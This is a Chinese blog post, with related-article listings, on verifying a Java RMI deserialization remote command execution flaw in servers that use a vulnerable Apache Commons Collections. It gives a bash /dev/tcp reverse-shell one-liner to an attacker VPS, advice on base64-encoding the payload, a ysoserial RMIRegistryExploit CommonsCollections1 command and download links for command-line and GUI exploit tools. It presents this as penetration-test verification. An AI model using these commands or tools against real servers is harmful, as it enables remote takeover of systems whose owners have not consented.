JAVA_RMI反序列化远程命令执行漏洞验证

已于 2023-06-21 17:58:31 修改
阅读量5.1k 收藏 3
点赞数 2
分类专栏: 渗透测试 网络安全 安全运维 文章标签: 渗透测试 java 运维 网络安全
于 2021-12-29 16:48:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44828901/article/details/122219342
版权
警告:本文所涉及内容只可用于交流学习,请勿使用本文提到的内容违反法律,本文和作者不提供任何担保!!!

一、漏洞原理

RMI是REMOTE METHODINVOCATION的简称,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。对于任何一个以对象为参数的RMI接口,你都可以发一个自己构建的对象,迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。 RMI的传输100%基于反序列化。

二、漏洞详情

1099端口是Java RMI的默认端口,RMI默认使用序列化来完成所有的交互,所以这是非常常见的漏洞。如果该端口暴露在公网上,且使用了Apache Commons Collections的漏洞版本,就可以在该服务器上执行相关命令。

工具下载链接(永久有效)

命令行工具:

链接:https://pan.baidu.com/s/1n8aVs5EjlWkR59u0XdXWbQ

提取码:6666

图形工具:

链接:https://pan.baidu.com/s/1rhHXVEeeUt2YBmZqZ_I4Cg
提取码:6666
 

三、验证漏洞

使用命令行工具验证:

这里我们尝试反弹shell.

首先在vps上面监听端口

反弹到vps上 bash -i >& /dev/tcp/ip/port 0>&1

注意:有时命令执行有效载荷Runtime.getRuntime().exec()会失败。当使用 web shell、反序列化漏洞或通过其他向量时,可能会发生这种情况。在 Base64 编码的帮助下,下面的转换器可以帮助减少这些问题。它可以通过调用 Bash 或 PowerShell 再次使管道和重定向变得更好,它还确保参数中没有空格。

base编码转换地址:https://www.jackson-t.ca/runtime-exec-payloads.html

或者本地搭建一个编码器,选择bash编码,将反弹shell命令复制进去

编码器工具:

链接:https://pan.baidu.com/s/1-xV7t-RA0qUhi8wnjT8BgQ
提取码:6666

本机cmd执行命令

把刚才经过base64编码生成的命令替换下面的“命令”。(通过漏扫设备已知改了默认端口,端口改为6200)

java cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.RMIRegistryExploit host port CommonsCollections1 "命令"

反弹shell成功,证明存在此漏洞。(获得的权限无法退格,后续可以通过提权进一步发掘)

使用图形化工具:

输入ip和端口,点击Disconn,回显框出现:“linux is Success;weblogic”,基本成功了。

在cmd命令行里输入whoami ,点击"Exeuate"。出现回显“weblogic”,存在此漏洞。

1

Kepler开普勒
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java RMI远程方法调用详解-例子代码
07-22
Java RMI远程方法调用详解-例子代码,例子详解在:http://blog.csdn.net/guyuealian/article/details/51992182
Java-RMI漏洞利用
2301_76175665的博客
06-16 1552
Java远程方法调用,也就是Java RMI,它是一种机制,允许一个Java虚拟机中的对象去访问和调用另一个Java虚拟机中包含的方法。这与RPC基本相同,但是在面向对象的范例中,而非面向过程,它允许不在同一个地址空间中的Java程序互相通信。192.168.73.130是我们的靶机(metasploitable2),靶机上安装了Java RMI服务(rmiregistry),运行在1099端口上,你也可以通过nmap扫描结果来看这个端口是开放的。在我们的攻击机上使用MSF,搜索java_rmi
远程代码执行(RCE)攻击:原理、案例分析与防御策略
最新发布
m0_61532714的博客
06-12 907
通过深入理解RCE的攻击原理及其潜在影响,开发者和可靠从业者可以采取有效的防御措施来保护Web应用程序的可靠。多层次的综合防御策略,包括输入验证、限制命令执行、使用可靠的库和函数以及严格的访问控制,是防范RCE攻击的关键。为了有效防范RCE攻击,需要采用多层次的防御策略,包括输入验证、限制命令执行、使用可靠的库和函数以及严格的访问控制。不可靠的反序列化是指攻击者通过构造恶意的序列化数据,使应用程序在反序列化执行恶意代码代码注入是指攻击者通过构造恶意输入,使应用程序执行注入的代码,从而控制目标服务器。
JAVA RMI 反序列化远程命令执行漏洞
热门推荐
LeeHDsniper的博客
05-11 2万+
JAVA RMI 反序列化远程命令执行漏洞 漏洞资料 背景 原理 Payload构造 搭建本地测试环境 开启包含第三方库的RMI服务 测试RMI客户端 攻击测试 升级版攻击 Weblogic Commons-Collections反序列化RCE漏洞CVE-2015-4852JAVA RMI 反序列化远程命令执行漏洞漏洞资料Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-324
Jmeter RMI 反序列化命令执行漏洞
m0_63241485的博客
08-26 854
ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload;由于其中部分payload使用到的低版本JDK中的类,所以建议使用低版本JDK .
Java RMI SERVER命令执行漏洞
m0_62670778的博客
05-12 411
RMI全称是Remote Method Invocation(远程方法调用),是专为Java环境设计的远程方法调用机制,远程服务器提供API,客户端根据API提供相应参数即可调用远程方法由此可见,使用RMI时会涉及到参数传递和结果返回,参数为对象时,要求对象可以被序列化。
java rmi远程方法调用漏洞,Java RMI(远程方法调用)示例程序
weixin_42505576的博客
03-10 320
Java RMI(远程方法调用)示例程序Java RMI(远程方法调用)示例程序1. 编写接口import java.rmi.*;public interface HelloIn extends java.rmi.Remote{String sayHello() throws RemoteException;}2. 实现远程接口import java.rmi.*;import java.net.*...
idea的ssm项目上配置Tomcat,解决端口占用报错提示:java.rmi.server.ExportException: Port already in use: 1099;
To_RUI的博客
04-03 810
idea的ssm项目上配置Tomcat,解决出现端口占用,报错java.rmi.server.ExportException: Port already in use: 1099; nested exception is:
javaRMI反序列化漏洞验证工具
08-21
Java RMI反序列化漏洞主要源于不正确的类型检查和信任机制。当接收到未经验证远程调用时,如果服务器没有正确地校验或限制输入数据,攻击者可以通过构造恶意序列化数据来操控远程对象的行为。这种漏洞可能允许...
Java序列化反序列化原理及漏洞解决方案
08-18
然而,Java序列化机制也存在一些漏洞,例如输入的反序列化的数据可被用户控制,那么攻击者即可通过构造恶意输入,让反序列化产生非预期的对象,在此过程中执行构造的任意代码。这使得Java序列化机制存在安全漏洞。 ...
java反序列化工具
11-21
然而,这个过程也可能引入安全风险,因为不安全的反序列化可能导致远程代码执行(RCE)漏洞。 在给定的标题和描述中,提到了几个关键的服务器端应用平台:JBoss、WebLogic和WebSphere。这些都是流行的Java企业级...
一键关闭1099端口占用
09-18
在启动java服务的时候经常会碰到端口被占用导致服务无法启动的问题,这是一个批处理文件,双击打开就可以直接关闭1099端口占用的进程,也可以通过修改1099端口来一键关闭其他端口。
java反序列化漏洞利用工具WebLogicExploit
01-14
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
java反序列化漏洞工具AllInOne
01-05
java反序列化漏洞检测工具集 支持 jboss weblogic Websphere 本工具仅为方便管理员发现和展示漏洞的危害性,请勿用于非法用途
java反序列化利用程序UI版Beta1.1.rar
07-20
3. **RMI远程方法调用)与反序列化**:JavaRMI机制在通信过程中使用了反序列化,攻击者可以通过操纵RMI请求来触发反序列化漏洞。 4. **反射与构造恶意对象**:攻击者可以利用Java的反射API创建和控制反序列化...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
在2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
rmi 反序列化漏洞_写一个rmi反序列化工具
weixin_39997037的博客
01-07 2167
RMI(java 远程方法调用),RMI服务端和客户端之间通过序列化对象进行传输,所以JDK8 U121之前的版本存在反序列化漏洞RMIjava反序列化原理就不详细介绍了。RMI反序列化利用成功的条件如下:1.能够进行rmi通信。2.JDK版本小于8.0.1213.引入存在反序列化链的库,以commons.collections为例的话,就需要其版本小于commons.collec...
rmi远程代码执行漏洞_JavaRMI服务远程方法调用漏洞如何修复lin
weixin_39872893的博客
12-22 1455
展开全部背景要求:62616964757a686964616fe58685e5aeb931333433623135定时监控远程主机上mongodb数据库内存使用的情况,当内存使用过大时暂停逻辑处理线程后启动内存空间的释放处理线程,释放完成后再启动逻辑处理线程。操作系统:CentOS64bit(Linux)步骤(代码省略):1.创建Socket远程服务器2.创建客户端配置:#查找对象stub端口RM...
rmi远程代码执行漏洞_RMI 远程命令执行分析
weixin_39834488的博客
12-22 786
原标题:RMI 远程命令执行分析一、 RMI 简介RMI是Remote Method Invocation的简称,是J2SE的一部分,能够让程序员开发出基于Java的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地Java对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。更多开发资料...
rmi远程反序列化rce漏洞_Spring框架的反序列化远程代码执行漏洞分析(转)
06-06
好的,我知道你的问题了。针对你提到的这个问题,我可以给你一些解释和分析。 首先,RMI(Remote Method Invocation)是Java远程调用机制的一种实现方式,它允许在不同的JVM进程之间进行Java对象的传输和远程调用。而反序列化(Deserialization)是将二进制数据转换为Java对象的过程。在Java中,对象的序列化和反序列化是通过ObjectInputStream和ObjectOutputStream类来实现的。 RMI远程反序列化RCE漏洞是指,攻击者可以通过构造恶意的序列化数据,使得服务端在反序列化执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的根本原因在于Java序列化机制的设计缺陷,攻击者可以通过构造恶意的序列化数据来绕过Java的安全机制,从而执行任意代码。 而Spring框架的反序列化远程代码执行漏洞,则是指攻击者可以通过构造恶意的序列化数据,使得Spring框架在反序列化执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的影响范围非常广泛,涵盖了Spring框架的多个版本,包括Spring MVC、Spring WebFlow、Spring Data等。 总的来说,RMI远程反序列化RCE漏洞和Spring框架的反序列化远程代码执行漏洞都是Java序列化机制的设计缺陷所导致的安全漏洞。攻击者可以通过构造恶意的序列化数据来绕过Java的安全机制,从而执行任意代码。因此,在开发Java应用程序时,需要注意对序列化和反序列化数据的处理,避免出现安全漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值